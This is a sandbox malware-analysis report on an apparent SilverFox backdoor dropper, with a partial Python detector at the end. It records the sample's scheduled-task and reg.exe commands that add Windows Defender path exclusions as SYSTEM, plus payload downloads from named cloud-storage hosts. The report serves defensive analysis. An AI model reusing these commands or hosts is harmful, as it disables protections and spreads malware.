Windows Analysis Report
2749837485743-7684385786.05.exe

Overview

General Information

Sample name: 2749837485743-7684385786.05.exe
Analysis ID: 1584634
MD5: 5b695fabfcd1da54f7c193ef5f11ef6a
SHA1: 8097a65d6e89522851b53b831aaf45afb9f0267b
SHA256: 697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
Tags: backdoor, exe, msi, silverfox, winos, user-zhuzhu0009

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 5oqa98.exe (PID: 1488 cmdline: C:\Users\user\Documents\5oqa98.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 5oqa98.exe (PID: 7688 cmdline: C:\Users\user\Documents\5oqa98.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 6612 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7692 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7404 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3348 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6852 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6568 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 896 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5736 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2600 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3132 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5480 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6400 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7124 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5640 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1672 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 7888 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 1820 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3148 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6428 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3628 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3964 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2856 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7136 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings):

Source: 7.2.5oqa98.exe.2890000.1.unpack | Rule: INDICATOR_SUSPICIOUS_DisableWinDefender | Description: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen | Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
Source: 8.2.5oqa98.exe.28f0000.1.unpack | Rule: INDICATOR_SUSPICIOUS_DisableWinDefender | Description: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen | Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\5oqa98.exe, ParentImage: C:\Users\user\Documents\5oqa98.exe, ParentProcessId: 7688, ParentProcessName: 5oqa98.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 6612, ProcessName: cmd.exe
Source: Process started | Author: frack113 | Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 1820, ProcessName: reg.exe
Source: Registry Key set | Author: Christian Burkard (Nextron Systems) | Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 1820, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
No Suricata rule has matched

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.9:49974 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb | source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, naBa3A.exe.8.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb | source: 189atohci.sys.0.dr
Source: Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb | source: 2749837485743-7684385786.05.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb | source: 5oqa98.exe, 00000007.00000000.2349192191.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000002.2575168949.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000000.2365695167.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe.0.dr

Change of critical system settings

Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData
Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users
Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)
Source: C:\Windows\System32\reg.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_00007FF8FF5DA1B8 FindFirstFileExW
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000DFFE: 4x nop then mov rax, qword ptr [rsp+78h]
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000DDFF: 4x nop then mov rax, qword ptr [rsp+78h]
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140011270: 4x nop then movsxd rbx, qword ptr [r14+10h]
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000DE96: 4x nop then mov rax, qword ptr [rsp+78h]
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000DEFB: 4x nop then mov rax, qword ptr [rsp+78h]
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000E178: 4x nop then mov rax, qword ptr [rsp+78h]
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_000000014000DDD9: 4x nop then mov rax, qword ptr [rsp+78h]
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 8_2_0062B085 InternetReadFile
Source: global traffic | HTTP traffic detected: GET /i.dat HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /a.gif HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /b.gif HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /c.gif HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d.gif HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /s.dat HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /s.jpg HTTP/1.1 | User-Agent: GetData | Host: hu5wd1.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drops.jpg HTTP/1.1 | User-Agent: GetData | Host: 22mm.oss-cn-hangzhou.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /f.dat HTTP/1.1 | User-Agent: GetData | Host: 22mm.oss-cn-hangzhou.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1 | User-Agent: GetData | Host: 22mm.oss-cn-hangzhou.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1 | User-Agent: GetData | Host: 22mm.oss-cn-hangzhou.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: hu5wd1.oss-cn-beijing.aliyuncs.com
Source: global traffic | DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com

System Summary

Source: 7.2.5oqa98.exe.2890000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 8.2.5oqa98.exe.28f0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140006C95 NtAllocateVirtualMemory
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Documents\5oqa98.exe | Code functions (process 7): 7_2_000000014000C3F0, 7_2_000000014000CC00, 7_2_0000000140001A30, 7_2_000000014000C2A0, 7_2_00000001400022C0, 7_2_00000001400110F0, 7_2_0000000140010CF0, 7_2_0000000140009300, 7_2_000000014000BB70, 7_2_0000000140003F80, 7_2_00000001400103D0, 7_2_00007FF8FF5E0248, 7_2_00007FF8FF5DA1B8
Source: C:\Users\user\Documents\5oqa98.exe | Code functions (process 8): 8_2_028F3CA0, 8_2_028F9280, 8_2_028F82C0, 8_2_028FC23C, 8_2_029010FC, 8_2_02A0F828, 8_2_0292C998, 8_2_028F86C8, 8_2_028FC6D0, 8_2_028F84C4, 8_2_02900C60, 8_2_028F8D78, 8_2_0062D535
Source: Joe Sandbox View | Dropped File: C:\Users\user\Documents\5oqa98.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 2749837485743-7684385786.05.exe, 00000000.00000000.1328965919.0000000141D79000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
Source: 2749837485743-7684385786.05.exe | Binary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 7.2.5oqa98.exe.2890000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 8.2.5oqa98.exe.28f0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.dr | Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr | Binary string: \Device\TrueSight
Source: classification engine | Classification label: mal92.evad.winEXE@55/18@2/2
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140001430 GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 8_2_028F18A0 CreateToolhelp32Snapshot,Process32First,Process32Next,SleepEx,CreateToolhelp32Snapshot
Source: C:\Users\user\Documents\5oqa98.exe | Code function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW
Source: C:\Users\user\Documents\5oqa98.exe | File created: C:\Program Files (x86)\naBa3A
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\i[1].dat
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\5oqa98.exe | Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:<pid>:120:WilError_03 for PIDs 4344, 3616, 3896 and 1816; \BaseNamedObjects\Local\SM0:<pid>:120:WilError_03 for PIDs 6068, 6436, 5776 and 5292
Source: 2749837485743-7684385786.05.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\5oqa98.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe | File read: C:\Users\user\Desktop\2749837485743-7684385786.05.exe
Source: unknown | Process created: C:\Users\user\Desktop\2749837485743-7684385786.05.exe "C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
Source: unknown | Process created: C:\Users\user\Documents\5oqa98.exe C:\Users\user\Documents\5oqa98.exe (two instances; processes 7 and 8 in the code-function listings above)
Source: C:\Users\user\Documents\5oqa98.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"<path>\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
    The chain runs four times, once per excluded <path>: "C:\ProgramData", "C:\Users", "C:\Program Files (x86)", "%USERPROFILE%\Documents".
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (eight instances, one per cmd.exe)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"<path>\" /t REG_DWORD /d 0 /f"
    <path> = "C:\ProgramData", "C:\Users", "C:\Program Files (x86)", "C:\Users\user\Documents" (cmd.exe has expanded %USERPROFILE% by the time schtasks.exe receives it).
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" (four instances)
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<path>" /t REG_DWORD /d 0 /f
    The task action itself, for each of the four paths; the sandbox attributes no parent, which is what a launch by the Task Scheduler service (the task is registered with /RU "SYSTEM") looks like in the process tree.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F (four instances)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "<path>" /t REG_DWORD /d 0 /f
    Four instances, writing the value names "C:\ProgramData", "C:\Users", "C:\Program Files (x86)" and "C:\Users\user\Documents", each with DWORD data 0.
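The four chains above share one template: register a one-shot task that runs as SYSTEM, run it at once, delete it, and let the task body write a DWORD 0 value named after the excluded path under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths. The Python below is an added example and not part of the Joe Sandbox report; it flags that template in process-creation command lines. The event records are constructed here in a minimal "parent|image|command line" form: the first four command lines are copied from the process tree above, the last two are benign controls made up for the test. The detail most substring rules miss is the `\"` escaping inside the /TR argument, which hides the inner `reg add` until the task actually runs; the scanner flattens it so the nested command is matched the same way as the bare reg.exe invocation.

```python
"""Flag Windows Defender exclusion tampering in process-creation command lines.

Added example, not Joe Sandbox output. Records are constructed here in a
minimal "parent|image|command line" form; the first four command lines are
taken from the sandbox process tree, the last two are benign controls.
"""
import re
from dataclasses import dataclass

SAMPLE_EVENTS = [
    r'5oqa98.exe|cmd.exe|"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F',
    r'cmd.exe|schtasks.exe|SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"',
    r'cmd.exe|reg.exe|reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f',
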